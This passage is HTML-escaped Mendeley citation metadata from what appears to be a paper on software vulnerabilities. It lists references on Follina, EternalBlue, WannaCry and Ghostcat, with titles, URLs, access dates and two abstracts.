Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_bb2cb374-7c7c-46d6-945d-e27bf44ecb3d&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[33]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;e526e9ab-ab53-302f-ae28-dda1469f721c&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;e526e9ab-ab53-302f-ae28-dda1469f721c&quot;,&quot;title&quot;:&quot;Follina — a Microsoft Office code execution vulnerability | by Kevin Beaumont | May, 2022 | DoublePulsar&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,17]]},&quot;URL&quot;:&quot;https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_808d12d8-21ac-4636-8929-734627facec4&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_407172f7-2dfe-4e5f-83fd-3bf8b5e0b9d6&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[32]–[36]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;b75484d5-a9b0-3474-bf8f-662801d022e1&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;b75484d5-a9b0-3474-bf8f-662801d022e1&quot;,&quot;title&quot;:&quot;Windows 10 RCE: The exploit is in the link | Positive Security&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,17]]},&quot;URL&quot;:&quot;https://positive.security/blog/ms-officecmd-rce&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;e526e9ab-ab53-302f-ae28-dda1469f721c&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;e526e9ab-ab53-302f-ae28-dda1469f721c&quot;,&quot;title&quot;:&quot;Follina — a Microsoft Office code execution vulnerability | by Kevin Beaumont | May, 2022 | DoublePulsar&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,17]]},&quot;URL&quot;:&quot;https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;c0f1a20e-f890-353b-9c5d-639dda69e001&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;c0f1a20e-f890-353b-9c5d-639dda69e001&quot;,&quot;title&quot;:&quot;NVD - CVE-2016-2183&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,10]]},&quot;URL&quot;:&quot;https://nvd.nist.gov/vuln/detail/CVE-2016-2183&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;c5acacfe-d3db-3eee-abaa-da31d2a6c90c&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;c5acacfe-d3db-3eee-abaa-da31d2a6c90c&quot;,&quot;title&quot;:&quot;CVE-2022-30190: Microsoft Support Diagnostic Tool (MSDT) RCE Vulnerability “Follina” | FortiGuard Labs &quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,17]]},&quot;URL&quot;:&quot;https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1fd3b5e2-ce59-3812-9d7b-61062dfc18d0&quot;,&quot;title&quot;:&quot;Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_59aa82b0-d8d4-444c-8687-387df6bf71f6&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[37]–[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;635b800b-ef49-3953-bd7e-903d284c7be4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;635b800b-ef49-3953-bd7e-903d284c7be4&quot;,&quot;title&quot;:&quot;Protecting customers and evaluating risk – Microsoft Security Response Center&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://msrc-blog.microsoft.com/2017/04/14/protecting-customers-and-evaluating-risk/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;9a14a168-2d46-3990-8b31-3709c5331e2d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;9a14a168-2d46-3990-8b31-3709c5331e2d&quot;,&quot;title&quot;:&quot;Working mechanism of Eternalblue and its application in ransomworm&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Liu&quot;,&quot;given&quot;:&quot;Zian&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;URL&quot;:&quot;http://arxiv.org/abs/2112.14773&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2021,12,29]]},&quot;abstract&quot;:&quot;After the leaking of exploit Eternalblue, some ransomworms utilizing this exploit have been developed to sweep over the world in recent years. Ransomworm is a global growing threat as it blocks users' access to their files unless a ransom is paid by victims. Wannacry and Notpetya are two of those ransomworms which are responsible for the loss of millions of dollar, from crippling U.K. national systems to shutting down a Honda Motor Company in Japan. Many dynamic analytic papers on Wannacry were published, however, static analytic papers about Wannacry were limited. Our aim is to present readers an systematic knowledge about exploit Eternalblue, from a high\\textendash leveled semantic view to the code details. Specifically, the working mechanism of Eternalblue, the reverse engineering analysis of Eternalblue in Wannacry, and the comparison with the Metasploit's Eternalblue exploit are presented. The key finding of our analysis is that the code remains almost the same when Eternalblue is transplanted into Wannacry, which indicates its potential for signatures and thus detection.&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;7a5737a4-e182-3dd9-891f-2212e4be879a&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;7a5737a4-e182-3dd9-891f-2212e4be879a&quot;,&quot;title&quot;:&quot;Exploitation of EternalBlue DoublePulsar [Windows 7 – 64bit] with Metasploit Framework - Yeah Hub&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,20]]},&quot;URL&quot;:&quot;https://www.yeahhub.com/exploitation-eternalblue-doublepulsar-windows-7-64bit-metasploit-framework/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_7fdca48f-eb44-427c-94cb-2e85b5468e4a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fN2ZkY2E0OGYtZWI0NC00MjdjLTk0Y2ItMmU4NWI1NDY4ZTRh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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_af5bcc10-97a7-4e7f-91aa-481f3e6d686a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYWY1YmNjMTAtOTdhNy00ZTdmLTkxYWEtNDgxZjNlNmQ2ODZh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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_ad0fc05e-2be7-4bb5-ba0a-62a9e956e0bb&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYWQwZmMwNWUtMmJlNy00YmI1LWJhMGEtNjJhOWU5NTZlMGJi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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_1432d584-9324-49f6-9767-73afd6844571&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMTQzMmQ1ODQtOTMyNC00OWY2LTk3NjctNzNhZmQ2ODQ0NTcx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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_d6938bf2-4a44-43b5-ae7a-082713477513&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZDY5MzhiZjItNGE0NC00M2I1LWFlN2EtMDgyNzEzNDc3NTEz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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_fc1115c6-76bc-41d8-9829-da288efff0dd&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZmMxMTE1YzYtNzZiYy00MWQ4LTk4MjktZGEyODhlZmZmMGRk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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_94fa5378-9231-4d9e-b335-9db4d9031bc1&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fOTRmYTUzNzgtOTIzMS00ZDllLWIzMzUtOWRiNGQ5MDMxYmMx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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_0ee1691e-704d-4b17-8a61-3c3b3d34fd11&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMGVlMTY5MWUtNzA0ZC00YjE3LThhNjEtM2MzYjNkMzRmZDEx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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4cb9ddf6-5749-4882-8258-e47398ed2f3a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNGNiOWRkZjYtNTc0OS00ODgyLTgyNTgtZTQ3Mzk4ZWQyZjNh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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_65b61c70-11c5-4022-9411-3b7678f58402&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjViNjFjNzAtMTFjNS00MDIyLTk0MTEtM2I3Njc4ZjU4NDAy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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_2f0c8739-7a0f-4912-8919-649c68303d8a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMmYwYzg3MzktN2EwZi00OTEyLTg5MTktNjQ5YzY4MzAzZDhh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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_57c7b067-2fc6-4c92-b44e-effd6a55f2ca&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[41]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;029eed67-8943-3039-a083-1f7386262ea3&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;029eed67-8943-3039-a083-1f7386262ea3&quot;,&quot;title&quot;:&quot;WannaCry ransomware: Analysis of infection, persistence, recovery prevention and propagation mechanisms&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Akbanov&quot;,&quot;given&quot;:&quot;Maxat&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Vassilakis&quot;,&quot;given&quot;:&quot;Vassilios G.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Logothetis&quot;,&quot;given&quot;:&quot;Michael D.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title&quot;:&quot;Journal of Telecommunications and Information Technology&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,8,8]]},&quot;DOI&quot;:&quot;10.26636/JTIT.2019.130218&quot;,&quot;ISSN&quot;:&quot;18998852&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2019]]},&quot;page&quot;:&quot;113-124&quot;,&quot;abstract&quot;:&quot;In recent years, we have been experiencing fast proliferation of different types of ransomware targeting home users, companies and even critical telecommunications infrastructure elements. Modern day ransomware relies on sophisticated infection, persistence and recovery prevention mechanisms. Some recent examples that received significant attention include WannaCry, Petya and BadRabbit. To design and develop appropriate defense mechanisms, it is important to understand the characteristics and the behavior of different types of ransomware. Dynamic analysis techniques are typically used to achieve that purpose, where the malicious binaries are executed in a controlled environment and are then observed. In this work, the dynamic analysis results focusing on the infamous WannaCry ransomware are presented. In particular, WannaCry is examined, during its execution in a purpose-built virtual lab environment, in order to analyze its infection, persistence, recovery prevention and propagation mechanisms. The results obtained may be used for developing appropriate detection and defense solutions for WannaCry and other ransomware families that exhibit similar behaviors.&quot;,&quot;publisher&quot;:&quot;National Institute of Telecommunications&quot;,&quot;issue&quot;:&quot;1&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_4ddc2455-fc29-40ef-8068-329037fe4e61&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[42], [43]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;d4046f48-6231-3813-9f83-eaed5fe1a346&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;d4046f48-6231-3813-9f83-eaed5fe1a346&quot;,&quot;title&quot;:&quot;Apache Tomcat® - Welcome!&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://tomcat.apache.org/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;9401d722-7acc-387c-80aa-268dac73b260&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;9401d722-7acc-387c-80aa-268dac73b260&quot;,&quot;title&quot;:&quot;CVE-2020-1938: Ghostcat vulnerability&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://www.chaitin.cn/en/ghostcat&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_96a34cb7-89c0-49ab-8f83-c04a930cb12d&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[44]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;4b7879d6-2b50-3244-96bb-89569492053f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;4b7879d6-2b50-3244-96bb-89569492053f&quot;,&quot;title&quot;:&quot;What is Middleware - Definition and Examples | Microsoft Azure&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,25]]},&quot;URL&quot;:&quot;https://azure.microsoft.com/en-in/overview/what-is-middleware/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_6a954428-df4f-4ce7-bb50-e26746a5eb4a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[45]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;309b57fc-0d66-3382-a753-9fe8f319c2ae&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;309b57fc-0d66-3382-a753-9fe8f319c2ae&quot;,&quot;title&quot;:&quot;Detail